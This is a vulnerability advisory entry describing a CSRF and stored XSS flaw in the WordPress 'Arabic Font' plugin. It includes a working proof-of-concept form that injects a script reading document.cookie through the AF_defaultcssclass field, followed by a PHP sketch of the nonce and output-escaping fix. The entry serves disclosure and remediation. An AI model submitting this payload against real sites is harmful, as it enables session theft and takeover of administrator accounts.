WordPress Plugin Vulnerabilities
Arabic Font - CSRF & Stored XSS
Description
Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab"><script>alert(document.cookie)</script><input+type="hidden"+value="">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>
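The two missing controls named in the description, sketched as an added example (not the plugin's code and not from the original advisory): a nonce check on save and entity encoding on output. The function names, the nonce action, the option key and the required capability are assumptions; only the field name AF_defaultcssclass and the action value come from the proof of concept. It runs inside a WordPress admin context.

```php
<?php
// Added example: hypothetical save handler and form for one plugin setting.
// AF_NONCE_ACTION, the af_example_* names, the option key and the
// 'manage_options' capability are assumptions made for illustration.

const AF_NONCE_ACTION = 'af_save_settings';

function af_example_save_settings() {
    if ( ! isset( $_POST['action'] ) || 'save' !== $_POST['action'] ) {
        return;
    }
    // CSRF: dies unless the request carries a valid nonce for this user and action.
    check_admin_referer( AF_NONCE_ACTION );

    // Authorization: only users who may manage options can change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Input: strip tags and control characters before the value is stored.
    $class = isset( $_POST['AF_defaultcssclass'] )
        ? sanitize_text_field( wp_unslash( $_POST['AF_defaultcssclass'] ) )
        : '';
    update_option( 'AF_defaultcssclass', $class );
}
add_action( 'admin_init', 'af_example_save_settings' );

function af_example_render_form() {
    $class = get_option( 'AF_defaultcssclass', '' );
    // Output: esc_attr() entity-encodes quotes and angle brackets, so a stored
    // value cannot close the value attribute and start a new element.
    ?>
    <form method="post">
        <?php wp_nonce_field( AF_NONCE_ACTION ); // emits the hidden _wpnonce field ?>
        <input type="hidden" name="action" value="save">
        <input type="text" name="AF_defaultcssclass"
               value="<?php echo esc_attr( $class ); ?>">
        <?php submit_button( 'Save changes' ); ?>
    </form>
    <?php
}
```

Escaping on output is the control that matters for values already stored before a fix is deployed; sanitizing on save alone leaves existing database rows untouched.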
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Submitter
rastating
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-07-20
Added
2017-07-21
Last Updated
2019-11-01